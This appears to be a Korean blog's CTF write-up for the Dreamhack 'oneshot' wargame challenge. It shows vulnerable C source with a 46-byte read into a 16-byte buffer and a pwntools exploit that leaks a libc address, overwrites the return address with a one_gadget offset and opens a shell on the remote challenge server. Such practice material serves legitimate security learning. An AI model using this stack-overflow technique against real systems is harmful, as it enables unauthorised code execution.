외로운 Nova의 작업실

dreamhack - oneshot write up 본문

Computer App Penetesting/System Vulnerability

dreamhack - oneshot write up

Nova_ 2023. 4. 21. 14:30

- source code

// gcc -o oneshot1 oneshot1.c -fno-stack-protector -fPIC -pie

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

int main(int argc, char *argv[]) {
    char msg[16];
    size_t check = 0;

    initialize();

    printf("stdout: %p\n", stdout);

    printf("MSG: ");
    read(0, msg, 46);

    if(check > 0) {
        exit(0);
    }

    printf("MSG: %s\n", msg);
    memset(msg, 0, sizeof(msg));
    return 0;
}

 

- exploit code

from pwn import *

p = remote("23.81.42.210", 9729)

#get address stdout
p.recvuntil("stdout: ")
stdout = p.recvuntil("\n")[:-1]

#proc - 1 :cal base lib address
stdout = int(stdout, 16)
lib_base = stdout - 0x3c5620
one_gadget = lib_base + 0x45216

#proc -2 : payload
payload = b"A"*24 + b"\x00"*8 + b"B"*8
payload += p64(one_gadget)

#overwirte one_shot gadget
p.send(payload)

#receive print
print(p.recv())

#interactive
p.interactive()

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - fho write up  (0) 2023.04.24
dreamhack - hook write up  (0) 2023.04.22
dreamhack - basic_rop_x86 write up  (0) 2023.04.20
dreamhack - basic_rop_x64 write up  (0) 2023.04.20
dreamhack 시스템해킹 - 12(ssp_001 문제 풀이)  (0) 2023.02.22
'Computer App Penetesting/System Vulnerability' Related Articles more
Comments